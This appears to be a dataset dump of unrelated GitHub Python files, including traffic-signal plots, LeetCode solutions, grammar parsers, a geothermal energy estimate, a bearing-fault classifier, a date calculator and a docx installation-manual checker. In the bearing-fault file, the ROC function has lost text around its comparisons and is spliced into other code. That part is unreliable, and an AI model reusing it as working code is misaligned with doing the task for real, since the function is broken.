[26.57614985,13.14624454,7727.714286]\nmpc_based_profile_3 = [26.57614985,13.14624454,7727.714286]\nfixed_time_profile_4 = [26.57614985,13.14624454,7727.714286]\nmpc_based_profile_4 = [26.57614985,13.14624454,7727.714286]\n\n# Plot MPC-based TSC for varying vehicle count error\nmpc_ql_error = [29.49078067, 31.41526384, 31.52831467, 31.64088214, 31.77035617]\nmpc_qt_error = [25.88264626, 26.09637689, 26.14654485, 26.18363233, 26.20754507]\nmpc_flow_error = [2157.6250000, 2129.7321429, 2129.9285714, 2128.9107143, 2129.3178571]\n\n#cycle_times = [\"No Error\", \"2% Error\", \"5% Error\", \"10% Error\", \"20% Error\"]\n#cycle_times = [15, 40, 65, 90]\n#width = 9.5\n\nplt.figure()\n\n# Width of a bar \ncycle_times = np.array(cycle_times)\n\nplt.bar(cycle_times, fixed_time_perf_qt, width, label=\"Fixed-time TSC\")\n#plt.bar(cycle_times, mpc_flow_error, color=\"r\", label=\"MPC-based TSC\")\nplt.bar(cycle_times+width, mpc_based_perf_qt, width, color=\"tab:orange\", label=\"MPC-based TSC\")\nplt.title(\"Comparison of Average Queue Times for Similar Cycle Times\")\nplt.xlabel(\"Cycle Time (s)\", fontsize=11)\nplt.ylabel(\"Average Queue Times (s)\", fontsize=11)\nplt.xlim((65,163))\n#plt.xlim((0,109.5))\n#plt.ylim((0,10500))\nplt.xticks([70,80,90,100,154], rotation=0)\n# First argument - A list of positions at which ticks should be placed\n# Second argument - A list of labels to place at the given locations\n#plt.xticks(cycle_times + width / 2, (\"Demand Profile 1\", \"Demand Profile 2\", \"Demand Profile 3\", \"Demand Profile 4\"))\nplt.legend()\n#plt.legend(loc='best')\nplt.gcf().autofmt_xdate()\n\nplt.show()\n","repo_name":"lendl-uy/Smart-Traffic","sub_path":"results/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":9364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72677722244","text":"\n\na = [1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n\nk = 15\n\ns = set()\n\nflag = False\n\nfor i in range(0, len(a)):\n\n if((k-a[i]) in s):\n print(\"number exist\")\n flag = True\n break\n elif(a[i] not in s):\n s.add(a[i])\n\nif(flag == False):\n print(\"does not exxist\")\n","repo_name":"hvaidsain/Python-Algorithms-and-Data-Structures","sub_path":"Implementation/Rough Practice Module/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10683310761","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def oddEvenList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n if not head:\n return \n \n odd_node=head\n even_node=head.next\n evenhead=head.next\n while even_node!=None and even_node.next!=None:\n odd_node.next=odd_node.next.next\n even_node.next=even_node.next.next\n \n odd_node=odd_node.next\n even_node=even_node.next\n odd_node.next=evenhead\n return head\n","repo_name":"HenokMekuanint/Competitiveprogramming","sub_path":"0328-odd-even-linked-list/0328-odd-even-linked-list.py","file_name":"0328-odd-even-linked-list.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"35513089403","text":"from mpl_toolkits.mplot3d import Axes3D\nfrom pylab import *\n\nT_surface = 3.0\nq_geothermal = 0.038\n\nrho_rock = 2794.0\nCp_rock = 682.0\nk_rock = 2.92\n\ntunnel_depth = 1440.0\nfield_radius = 620.0\n\ndef T_ground(z):\n return T_surface - q_geothermal / k_rock * z\n\nclass Voxel:\n\n def __init__(self, xlim, ylim, zlim):\n self.xlim = xlim\n self.ylim = ylim\n self.zlim = zlim\n self.x_center = mean(xlim)\n self.y_center = mean(ylim)\n self.z_center = mean(zlim)\n self.T_mean = T_ground(self.z_center)\n\n def energy_release(self, T_ref):\n delta_T = self.T_mean - T_ref\n volume = (xlim[1] - xlim[0]) * (ylim[1] - ylim[0]) * (zlim[1] - zlim[0])\n # J = W * s ==> GW / 1e9 * h / 3600\n E = rho_rock * Cp_rock * volume * delta_T / (3600.0 * 1e9)\n return E\n\ndef create_voxel(xlim, ylim, zlim):\n z = mean(zlim)\n if z <= -tunnel_depth:\n dx = mean(xlim)\n dy = mean(ylim)\n dz = z + tunnel_depth\n distance = sqrt(dx**2 + dy**2 + dz**2)\n if distance <= field_radius:\n return Voxel(xlim, ylim, zlim)\n return None\n\nT_ref = 2.0\n\ndx, dy, dz = 20, 20, 20\n\nvoxels = []\n\nx_range = arange(-1000, 1000, dz)\ny_range = arange(-1000, 1000, dy)\nz_range = arange(-2000, -1000, dz)\n\nx, y, z, T, E = [], [], [], [], []\n\nfor i in range(len(z_range)):\n zlim = [z_range[i], z_range[i]+dz]\n for j in range(len(y_range)):\n ylim = [y_range[j], y_range[j]+dy]\n for k in range(len(x_range)):\n xlim = [x_range[k], x_range[k]+dx]\n voxel = create_voxel(xlim, ylim, zlim)\n if voxel:\n voxels.append(voxel)\n x.append(voxel.x_center)\n y.append(voxel.y_center)\n z.append(voxel.z_center)\n T.append(voxel.T_mean)\n E.append(voxel.energy_release(T_ref))\n print(\"%.3f %%\"% ((i+1)*100.0/len(z_range)))\n\nprint(\"N=%d\"%len(voxels))\nprint(\"E=%f\"%sum(E))\nprint(\"min(E)=%f, max(E)=%f\"%(min(E),max(E)))\nprint(\"mean(T)=%f\"%(sum(T)/len(T)))\nprint(\"min(T)=%f max(T)=%f\"%(min(T),max(T)))\n\ndelta_T = (sum(T)/len(T)) - T_ref\nvolume = 0.5 * 4.0 / 3.0 * pi * field_radius**3\nE = rho_rock * Cp_rock * volume * delta_T / (3600.0 * 1e9)\nprint(volume*1e-6)\nprint(\"total(E)=%f\"%E)\n\nfig = figure()\nax = Axes3D(fig)\n\nax.scatter(x, y, z, s=T)\n\nshow()\n","repo_name":"giecli/Energiakaivos","sub_path":"Code/Seminar/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25673803773","text":"#Paderborn data autoencoder tests envelope\n#used Modules\nimport numpy as np\n#import autoencoderKeras as aK\nfrom scipy.io import loadmat#reading mat file\nimport os\nimport matplotlib.pyplot as plt\nfrom keras.models import Model#type of the ANN model\nfrom keras.layers import Dense,Input,Dropout#fully connected layer\nfrom keras.models import Sequential\nfrom keras.utils import to_categorical\nfrom sklearn.svm import LinearSVC\n#dummies\nnum_of_hidden_layers=3\nnum_of_neurons=[2048,512,128]\nf=np.arange(8189)*(8000/8188)#frequency axis values of envelope signal\nfault_t='inner'\nsample_test=37\nif fault_t=='outer':\n fault_l=1\nelse:\n fault_l=0\n\n#read Data\nsave_path='/home/gurkan/Desktop/mlann/pythonfiles/autoencoder/stacked/autoEncoders/compdecomp1/'\npath='/home/gurkan/Desktop/mlann/matlabfilesenvelopeanalysis/'\ndef readPadeEnvelope(path):\n data={}\n for folders in os.listdir(path):\n env=[]\n if folders.startswith('K'):\n for files in os.listdir(path+folders):\n dummy=loadmat(path+folders+'/'+files)\n if len(env)==0:\n env=dummy['env_mat']\n else:\n env=np.append(env,dummy['env_mat'],axis=1)\n data.update({folders:env})\n return data\n#normalization of data\ndef normalize(data_in):\n data=np.copy(data_in)\n data[:,0]=0\n min_vec=np.min(data,axis=1)\n max_vec=np.max(data,axis=1)-min_vec\n for i in range(len(max_vec)):\n data[i,:]=(data[i,:]-min_vec[i])/max_vec[i]\n data_nors={'min':min_vec,'max':max_vec}\n return data,data_nors\n\ndef denormalize(data_in,data_nors):\n data=np.copy(data_in)\n for i in range(len(data_nors['max'])):\n data[i,:]=data[i,:]*data_nors['max'][i]+data_nors['min'][i]\n return data\n#create training and test sets\ndef create_test_train_set(data):\n '''\n inner=[]\n healthy=[]\n outer=[]\n in_out=[]\n for key in data.keys():\n if '00' in key:\n healthy.append(key)\n elif 'A' in key:\n outer.append(key)\n elif 'I' in key:\n inner.append(key)\n #elif 'B' in key:\n # in_out.append(key)\n test_set=[]\n '''\n test_set=[['K001','KA04','KI04'],['K002','KA15','KI14'],['K003','KA16','KI16'],['K004','KA22','KI18'],['K005','KA30','KI21']]\n train_set=[]\n for i in range(len(test_set)):\n train_set.append(list(set(data.keys())-set(test_set[i])))\n return train_set,test_set\n\n#extracting features for data\ndef feature_extract(data,f):\n inner_f=123.3\n f_turn=25\n outer_f=76.25\n f_inner=np.argmin(abs(f-inner_f))\n f_inner2=np.argmin(abs(f-inner_f+f_turn))\n f_outer=np.argmin(abs(f-outer_f))\n inner=[np.sum(np.concatenate((data['data'][i,:][f_inner-1:f_inner+2],data['data'][i,:][f_inner2-1:f_inner2+2]),axis=0))/np.max(data['data'][i,:]) for i in range(len(data['data'][:,0]))]\n outer=[np.sum(np.concatenate((data['data'][i,:][f_outer-1:f_outer+2],data['data'][i,:][2*f_outer-1:2*f_outer+2]),axis=0))/np.max(data['data'][i,:]) for i in range(len(data['data'][:,0]))]\n data_stats={'inner':np.asarray(inner),'outer':np.asarray(outer)}\n return data_stats\n\ndef ready_to_classify(data,training_set,test_set):\n training_data=[]\n training_labels=[]\n test_data=[]\n test_labels=[]\n for key in data.keys():\n for i in range(np.size((data[key]),axis=1)):\n if key in training_set:\n training_data.append(data[key][:,i])\n if key.startswith('KI'):\n training_labels.append(1)\n elif key.startswith('KA'):\n training_labels.append(2)\n else:\n training_labels.append(0)\n else:\n test_data.append(data[key][:,i])\n if key.startswith('KI'):\n test_labels.append(1)\n elif key.startswith('KA'):\n test_labels.append(2)\n else:\n test_labels.append(0)\n data=(np.asarray(training_data))\n data_t=(np.asarray(test_data))\n training={'data':data,'labels':np.asarray(training_labels)}\n test={'data':data_t,'labels':np.asarray(test_labels)}\n return training,test\n\n#healthy values\ndef healthy_average_std(data_features,data_labels,fault_type):\n if fault_type=='inner':\n _index_h=np.where(data_labels!=1)\n _index_f=np.where(data_labels==1)\n else:\n _index_h=np.where(data_labels!=2)\n _index_f=np.where(data_labels==2)\n _mean=np.mean(data_features[fault_type][_index_h])\n _std=np.std(data_features[fault_type][_index_h])\n _mean_f=np.mean(data_features[fault_type][_index_f])\n _std_f=np.std(data_features[fault_type][_index_f])\n return _mean,_std,_std_f,_mean_f\n\n#Rule Based classifier\ndef my_classifier(test_data_features,thr_i,thr_o):\n p_l=np.zeros(len(test_data_features['inner']))\n for i in range(len(test_data_features['inner'])):\n if test_data_features['inner'][i]>thr_i:\n if test_data_features['inner'][i]>test_data_features['outer'][i]:\n p_l[i]=1\n else:\n p_l[i]=2\n elif test_data_features['outer'][i]>thr_o:\n p_l[i]=2\n\n return p_l\n\n#ROC curve\ndef my_roc(data_features,data_labels,h_mu,h_std,fault_type):\n _k=np.linspace((np.max(data_features)-h_mu)/h_std,(np.min(data_features)-h_mu)/h_std,num=1000)\n _acc=np.ones(len(_k))\n _tpr=np.ones(len(_k))\n _fpr=np.ones(len(_k))\n for i in range(len(_k)):\n if fault_type=='inner':\n _tpr[i]=np.sum([a and b for a, b in zip(data_features>h_mu+_k[i]*h_std, data_labels==1)])/len(data_labels)\n _fpr[i]=np.sum([a and b for a, b in zip(data_featuresh_mu+_k[i]*h_std, data_labels==2)])/len(data_labels)\n _fpr[i]=np.sum([a and b for a, b in zip(data_features lower_limit:\n rows[symbol] = row\n except:\n # BRK-B, RDS-B, BF-B, JW-A\n if symbol in [\"BRK-B\", \"RDS-B\", \"BF-B\", \"JW-A\"]:\n rows[symbol] = row\n pass\n\n print(i, row)\n\n# output\n# csv\ncsv_f = open(csv_fn, 'w', newline = '')\ncsvw = csv.writer(csv_f, delimiter = '\\t')\n\nfor symbol in sorted(rows.keys()):\n csvw.writerow(rows[symbol])\n\ncsv_f.close()\n","repo_name":"kjmatsuda/python-us-stock","sub_path":"python-club/ch4/get_ticker.py","file_name":"get_ticker.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70262289285","text":"from MyModule.production import getProducts\n\n\ndef getTable(products, variables):\n table = {}\n for v in variables:\n vProducts = getProducts(v, products)\n table[v] = vProducts\n return table\n\n\nclass Parser():\n\n def __init__(self, start_var, products, variables):\n self.start_var = start_var\n # table of each 'variable' and its 'productions'\n self.table = getTable(products, variables)\n\n# TODO:valid_it\n\n\nclass DepthParser(Parser):\n\n def __init__(self, start_var, products, variables):\n return super().__init__(start_var, products, variables)\n\n def parse(self, target):\n from MyModule.funcs import its_terminal, its_variable\n start = Node(self.start_var, target, \" \", None)\n for p in self.table[start.value]:\n start.childs.append(Node(p, target, start.value+\"->\"+p, start))\n if self.parse_inside(start.childs[-1]):\n start.valid = True\n return (start, True)\n return (start, False)\n\n def parse_inside(self, node):\n from MyModule.funcs import its_terminal, its_variable\n if not node.its_valid():\n node.valid = False\n return False\n if node.its_match():\n node.valid = True\n return True\n for c in node.value:\n if its_variable(c):\n for p in self.table[c]:\n new_value = node.value.replace(c, p, 1)\n node.childs.append(\n Node(new_value, node.target, c+\"->\" + p, node))\n if self.parse_inside(node.childs[-1]):\n node.valid = True\n return True\n return False\n\n\nclass BreadthParser(Parser):\n\n def __init__(self, start_var, products, variables):\n self.stack = []\n return super().__init__(start_var, products, variables)\n\n def parse(self, target):\n from MyModule.funcs import its_terminal, its_variable\n start = Node(self.start_var, target, \" \", None)\n for p in self.table[start.value]:\n nc = Node(p, target, start.value+\"->\"+p, start)\n start.childs.append(nc)\n self.stack.append(nc)\n while self.stack:\n if self.parse_inside(self.stack.pop(0)):\n return (start, True)\n\n return (start, False)\n\n def parse_inside(self, node):\n from MyModule.funcs import its_terminal, its_variable\n if not node.its_valid():\n node.valid = False\n return False\n if node.its_match():\n node.valid_it()\n return True\n for c in node.value:\n if its_variable(c):\n for p in self.table[c]:\n new_value = node.value.replace(c, p, 1)\n nc = Node(new_value, node.target, c+\"->\" + p, node)\n node.childs.append(nc)\n if nc.its_match():\n nc.valid_it()\n return True\n self.stack.append(nc)\n return False\n\n\nclass Node():\n\n def __init__(self, value, target, p, parent):\n self.p = p\n self.parent = parent\n self.valid = None\n self.value = value\n self.target = target\n self.childs = []\n\n def its_valid(self):\n if len(self.target) < len(self.value):\n return False\n from MyModule.funcs import its_terminal, its_variable\n for i in range(0, len(self.value)):\n if its_variable(self.value[i]):\n break\n if self.value[i] != self.target[i]:\n return False\n for i in range(-1, len(self.value)*-1, -1):\n if its_variable(self.value[i]):\n break\n if self.value[i] != self.target[i]:\n return False\n return True\n\n def its_match(self):\n return self.value == self.target\n\n def valid_it(self):\n self.valid = True\n if self.parent:\n self.parent.valid_it()\n\n\nclass S_Parser(Parser):\n\n def __init__(self, start_var, products, variables):\n return super().__init__(start_var, products, variables)\n\n def parse(self, target):\n from MyModule.funcs import its_terminal, its_variable\n start = Node(self.start_var, target, \" \", None)\n for p in self.table[start.value]:\n if p[0] == target[0]:\n start.childs.append(\n Node(p, target[1:], start.value+\"->\"+p, start))\n if self.parse_inside(start.childs[0]):\n return (start, True)\n return (start, False)\n\n def parse_inside(self, node):\n from MyModule.funcs import its_terminal, its_variable\n if not node.target:\n if not any(its_variable(c) for c in node.value):\n node.valid_it()\n return True\n else:\n return False\n for c in node.value:\n if its_variable(c):\n for p in self.table[c]:\n if p[0] == node.target[0]:\n node.childs.append(\n Node(node.value.replace(c, p, 1), node.target[1:], c+\"->\"+p, node))\n if self.parse_inside(node.childs[0]):\n return True\n break\n return False\n","repo_name":"Hame-daani/TLM-project","sub_path":"code/MyModule/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39821622096","text":"import tensorflow as tf\n\n# 创建值全部为0的张量\ntensor_zeros = tf.zeros(shape=[2, 3], # 2行3列\n dtype='float32') # 类型\n\n# 创建值全部为1的张量\ntensor_ones = tf.ones(shape=[2, 3], dtype='float32')\n\n# 创建正态分布随机张量\ntensor_nd = tf.random_normal(shape=[10], # 一维,10个元素\n mean=1.7, # 中位数\n stddev=0.2, # 标准差\n dtype='float32')\n# 创建形状和tensor_ones一样,值为0的张量\ntensor_zeros_like = tf.zeros_like(tensor_ones)\n\nwith tf.Session() as sess:\n print(tensor_zeros.eval()) # eval表示在session中执行计算\n print(tensor_ones.eval())\n print(tensor_nd.eval())\n print(tensor_zeros_like.eval())\n","repo_name":"Gaofan666/KesonData","sub_path":"深度学习/26_生成张量.py","file_name":"26_生成张量.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34461374795","text":"from queuing_hub.publisher import Publisher\nfrom queuing_hub.subscriber import Subscriber\n\n\nclass Forwarder:\n\n def __init__(\n self, sub: str, topic: str, max_num: int = 1,\n aws_profile_name=None,\n gcp_credential_path=None,\n gcp_project=None\n ):\n self.publisher = Publisher(\n aws_profile_name=aws_profile_name,\n gcp_credential_path=gcp_credential_path,\n gcp_project=gcp_project\n )\n self.subscriber = Subscriber(\n aws_profile_name=aws_profile_name,\n gcp_credential_path=gcp_credential_path,\n gcp_project=gcp_project\n )\n self.topic = topic\n self.sub = sub\n self.max_num = max_num\n\n def transport(self, ack: bool = True) -> list:\n messages = self.subscriber.pull(\n sub_list=[self.sub],\n max_num=self.max_num,\n ack=ack\n )\n\n responses = []\n if not messages:\n return responses\n\n for message in messages:\n response = self.publisher.push(\n topic_list=[self.topic],\n body=message\n )\n responses.append(response)\n return responses\n\n def pass_through(self):\n return self.transport(ack=False)\n","repo_name":"tosh2230/py-queuing-hub","sub_path":"queuing_hub/forwarder.py","file_name":"forwarder.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11570930084","text":"class Solution(object):\n def getMinDistSum(self, positions):\n \"\"\"\n :type positions: List[List[int]]\n :rtype: float\n \"\"\"\n def dist(x, y):\n return sum(sqrt((x - a) ** 2 + (y - b) ** 2) for a, b in positions)\n diff = 100\n x = sum(x for x, _ in positions) / float(len(positions))\n y = sum(y for _, y in positions) / float(len(positions))\n cur = dist(x, y)\n while diff > 1e-6:\n found = False\n for dx, dy in [(-1, 0), (1, 0), (0, -1), (0, 1)]:\n nx, ny = x + diff * dx, y + diff * dy\n new = dist(nx, ny)\n if new < cur:\n cur = new\n x, y = nx, ny\n found = True\n break\n if not found: diff /= float(2)\n return cur\n \n \n \n","repo_name":"htingwang/HandsOnAlgoDS","sub_path":"LeetCode/1515.Best-Position-For-A-Service-Centre/Best-Position-For-A-Service-Centre.py","file_name":"Best-Position-For-A-Service-Centre.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"32457394735","text":"# Python 2\n# Auther: Fadi Rustom\n\ndef nextDay(year, month, day):\n \"\"\"\n Returns the year, month, day of the next day.\n Simple version: assume every month has 30 days.\n \"\"\"\n if day Date1\", False\n return days\n\ndef isLeapYear(year):\n if year % 400 == 0:\n return True\n if year % 100 == 0:\n return False\n if year % 4 == 0:\n return True\n return False\n\ndef daysInMonth(year, month):\n if month ==1 or month ==3 or month==5 or month ==7 or month ==8 or month ==10 or month ==12:\n return 31\n if month ==2:\n if isLeapYear(year):\n return 29\n return 28\n else:\n return 30\n return 30\n\ndef test():\n test_cases = [((2012,9,30,2012,10,30),30), \n ((2012,1,1,2013,1,1),366),\n ((2012,9,1,2012,9,4),3),\n ((2013,1,1,1999,12,31), \"AssertionError\")]\n \n for (args, answer) in test_cases:\n try:\n result = daysBetweenDates(*args)\n if result != answer:\n print (\"Test with data:\", args, \"failed\")\n else:\n print (\"Test case passed!\")\n except AssertionError:\n if answer == \"AssertionError\":\n print (\"Nice job! Test case {0} correctly raises AssertionError!\\n\".format(args))\n else:\n print (\"Check your work! Test case {0} should not raise AssertionError!\\n\".format(args)) \n\ntest()\n\ndef myTest():\n ''' Test with True Prog'''\n assert daysBetweenDates (2013,1,1,2013,1,1) == 0\n assert daysBetweenDates (2013,1,1,2013,1,2) == 1\n assert daysBetweenDates (2013,1,1,2014,1,1) == 365\n assert nextDay(2012,2,28) == (2012,2,29)\n assert nextDay(2012,12,31) == (2013,1,1)\n print ('Tests finished')\n\nmyTest()\n","repo_name":"FadiRustom/FadiPython","sub_path":"daysBetweenDates.py","file_name":"daysBetweenDates.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"31526592796","text":"#encoding=utf-8\nimport os\nimport docx\nfrom win32com import client as wc\nimport re\n\nfrom app.checkSqlBySh import CheckSql\nfrom app.Mkdirs import Mkdirs\n\nclass DealPack:\n def __init__(self, dpath):\n self.dpath = dpath\n\n def GetShName(self, str1, filename, docxname, xqdir):\n \"\"\"\n :param str1: sbin脚本添加的内容\n :param filename: docx的绝对路径文件名\n :param docxname:docx的文件名\n :param xqdir:XQ号\n :return:\n \"\"\"\n tli = str1.split(\" \")\n for name in tli:\n if name.endswith('.sh'):\n shname = filename.replace(docxname, name)\n t = str1.split(' ')\n for s in t:\n if 'pybak' in s or 'pyback' in s:\n mkdirs = \"/\".join((xqdir, s))\n else:\n s = \" \".join((xqdir, s))\n mkdirs = ' '.join(('install ', s))\n #shname格式:'E:\\SVN\\2019\\20190110w\\特色业务平台\\t6\\fbap.20190110rw.t6\\XQ-2018-801\\TS_77044_AFA_20100117_pybak.sh'\n return shname, mkdirs\n\n def __dealDocxFile(self, filename):\n \"\"\"\n :function:word文档处理\n :param filename:\n :return:\n \"\"\"\n print(\"【*****__dealDocxFile开始处理文档[%s]*****】\" % filename)\n if os.path.isfile(filename):\n sfile = ('XQ', 'BUG', 'TR')\n listdir = filename.split('\\\\')\n listdir.pop()\n if listdir[-1].startswith(sfile):\n xqdir = listdir.pop()\n # 组建路径‘F:\\\\TFS_l\\\\文档&DB&AFEjar包\\\\WEEK\\\\2019\\\\20190117’\n mkpth = '\\\\'.join((listdir[0], \"\"))\n for p in listdir[1:]:\n print(p)\n mkpth = os.path.join(mkpth, p)\n print('sbin的目录是[%s], XQ号的名称是:[%s]' % (mkpth, xqdir))\n print(filename)\n file = docx.Document(filename)\n # 处理docx文档中的表格,处理cfg文件\n tables = file.tables\n\n for table in tables:\n for i in range(1, len(table.rows)):\n result = table.cell(1, 0).text\n if \"PORT\" in result:\n print(result)\n mk = Mkdirs(mkpth, result)\n\n print(\"段落数: \", str(len(file.paragraphs)))\n # 输出段落编号及段落内容\n for i in range(len(file.paragraphs)):\n # print(\"第\" + str(i) + \"段的内容是:\" + file.paragraphs[i].text)\n \"\"\"\n re.findall(r'\\w{2} \\w{2}_\\d{5}_X_\\d{8}.\\w{2}', file.paragraphs[i].text) #匹配fbapDB\n re.findall(r'\\w{2} \\w{2}_\\d{5}_\\w{3}_\\d{8}_pybak.sh', file.paragraphs[i].text) #匹配pybak.sh\n re.findall(r'\\w{2} \\w{2}_\\d{5}_\\w{4}_\\w{2}_\\d{8}.sh', file.paragraphs[i].text) #匹配bsmsDB\n \"\"\"\n # 检查安装手册里面的文档是否存在\n fp = file.paragraphs[i].text.replace('\\t', '')\n fp.rstrip()\n if \"mkdir\" in fp: # 拼接afa、afe的sh脚本\n print('>>>>>>>>>>>>>>>>>>>开始拼接afa、afe脚本<<<<<<<<<<<<<<<<<<<<')\n mkdirs = fp\n if \"inst1\" in mkdirs:\n print('afa:[%s]' % mkdirs)\n else:\n print('afe:[%s]' % mkdirs)\n mk = Mkdirs(mkpth, mkdirs)\n elif fp.endswith('.sh'):\n print('>>>>>>>>>>>>>>>>>>>>开始处理脚本[%s]<<<<<<<<<<<<<<<<<<<<<' % fp)\n t = fp.split(' ')\n for n in range(len(t)):\n if t[n].endswith('.sh'):\n rename = t[n]\n f = filename.split('\\\\').pop()\n # nfilename = filename.replace(f, file.paragraphs[i].text)\n nfilename = filename.replace(f, rename)\n print('新拼接的文件名是[%s]' % nfilename)\n if not os.path.isfile(nfilename):\n print(\"安装手册[%s]中的文件[%s]不存在\" % (filename, nfilename))\n return None\n else: # 拼接sbin下面所有的sh、add文件\n if \".sh\" in fp:\n for s in fp.split(' '):\n if s.endswith('.sh'):\n shs = s\n if re.findall(r'\\w{2}_\\d{5}_\\w_\\d{8}.\\w{2}', shs):\n print('【************fbapDB开始处理:[%s]************】' %fp)\n shn, mkdirs = self.GetShName(fp, filename, f, xqdir)\n elif re.findall(r'\\w{2}_\\d{5}_\\w{4}_\\w{2}_\\d{8}.sh', shs):\n print('【************bsmsDB开始处理:[%s]************】' % fp)\n print('bsmsdb:[%s]' % file.paragraphs[i].text)\n shn, mkdirs = self.GetShName(fp, filename, f, xqdir)\n elif re.findall(r'\\w{2}_\\d{5}_\\w{3}_\\d{8}_\\w{5,6}.sh', shs):\n print('【************pybak开始处理:[%s]************】' % fp)\n # mkdirs = '/'.join((xqdir, file.paragraphs[i].text))\n shn, mkdirs = self.GetShName(fp, filename, f, xqdir)\n Mkdirs(mkpth, mkdirs)\n else:\n continue\n print(shn)\n CheckSql(shn, mkpth, mkdirs)\n\n def TextFile(self):\n dlist = self.dpath.split('\\\\')\n print(dlist)\n filename = self.dpath\n if os.path.isfile(self.dpath):\n print(\"DealPack-->>self.dpath[%s]\" % filename)\n dfile = os.path.splitext(filename)\n if dfile[1] == \".docx\": # 处理docx文件\n self.__dealDocxFile(filename)\n elif dfile[1] == \".doc\": # 将doc文件转换成docx文件\n print(\"处理doc文件[%s]...\" % filename)\n w = wc.Dispatch('Word.Application')\n doc = w.Documents.Open(filename)\n newfile = \"\".join((dfile[0], \".docx\"))\n doc.SaveAs(newfile)\n self.__dealDocxFile(newfile)\n return '000000'\n\nif __name__ == '__main__':\n dpath = 'F:\\\\黄小宝的宝\\\\测试目录\\\\fbap.20190110rw.t6\\\\XQ-2018-801\\\\TS_75994_安装操作部署手册.docx'\n t = DealPack(dpath)\n t.TextFile()","repo_name":"huangchao20/MyScript","sub_path":"func/DealPackages.py","file_name":"DealPackages.py","file_ext":"py","file_size_in_byte":6609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11547075101","text":"import librosa\nimport librosa.display\nimport pyaudio\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport wave\nimport soundfile as sf\nimport pyrubberband as pyrb\nimport time\nfrom pathlib import Path\nimport threading\nimport os\n\nclass AudioSampler(object):\n def __init__(self):\n # PyAudio Initialization\n self.pa_format = pyaudio.paFloat32\n self.pa_channels = 1\n self.pa_rate = 44100\n self.pa_chunk = 1024 * 2\n self.p = None\n self.pa_stream = None\n #self.pa_length = 512\n self.pa_num_samples = 0\n\n # Librosa Initialization\n self.lr_length = 512\n self.lr_array = None\n self.lr_chunk = 1024 * 2\n self.lr_sr = None # note to set 44100 if not initialized by load\n\n # Filesystem Initialization\n self.files_list = []\n self.root_dir = os.getcwd()\n self.input_dir = self.root_dir + r'\\data\\ffmpeg\\outputs'\n\n def pa_stream_open(self):\n # Intergration WIP\n self.p = pyaudio.PyAudio()\n self.pa_stream = self.p.open(format=self.pa_format,\n channels=self.pa_channels,\n rate=self.pa_rate,\n input=True,\n output=False,\n stream_callback=self.callback,\n frames_per_buffer=self.pa_chunk)\n\n def import_file(self):\n self.files_list = os.listdir(self.input_dir)\n for path in os.listdir(self.input_dir):\n if os.path.isfile(os.path.join(self.input_dir, path)):\n self.files_list.append(path)\n #print(self.files_list)\n print(\"{0} of files added.\".format(len(self.files_list)))\n\n def lr_load(self):\n # Test driver\n file_name = self.input_dir + r'\\\\' + self.files_list[0]\n self.lr_array, self.lr_sr = librosa.load(file_name)\n\n def testd_centroid(self):\n cent_obj = librosa.feature.spectral_centroid(y=self.lr_array, sr=self.lr_sr, n_fft=self.lr_chunk,\n hop_length=self.lr_length)[0]\n print(cent_obj.shape)\n cent_frames = range(len(cent_obj))\n cent_t = librosa.frames_to_time(cent_frames, hop_length=self.lr_length)\n print(len(cent_t))\n\n plt.figure(figsize=(25,10))\n plt.plot(cent_t, cent_obj, color='r')\n plt.show()\n plt.savefig('testd_centroid.jpg')\n\n def start(self):\n pass\n\n def stop(self):\n print(\"Process Halted.\")\n\n def callback(self, in_data, frame_count, time_info, flag):\n # WIP\n self.lr_array = np.frombuffer(in_data, dtype=np.float32)\n\n def mainloop(self):\n pass\n\naudio = AudioSampler()\naudio.import_file()\naudio.lr_load()\naudio.testd_centroid()\naudio.stop()","repo_name":"colorlit/invoice","sub_path":"AudioSampling.py","file_name":"AudioSampling.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"32538740310","text":"from itertools import combinations\r\nfrom math import pow, sqrt, acos, pi\r\n\r\nclass Triangle:\r\n\r\n def __init__(self, coords):\r\n if isinstance(coords, list):\r\n if len(coords) == 3:\r\n self.coords = coords\r\n else:\r\n raise ValueError(\"Wrong number of coordinates. Must be 3!\")\r\n else:\r\n raise TypeError(\"Argument must be a list of coordinates.\")\r\n\r\n\r\n def calculate_sides(self):\r\n self.sides = []\r\n for x, y in combinations(self.coords, 2):\r\n self.sides.append(sqrt(pow(y[0] - x[0], 2) + pow(y[1] - x[1], 2)))\r\n self.a, self.b, self.c = [round(side, 3) for side in self.sides]\r\n\r\n\r\n def calculate_angles(self):\r\n self.alpha = acos((self.b**2 + self.c**2 - self.a**2) / (2 * self.b * 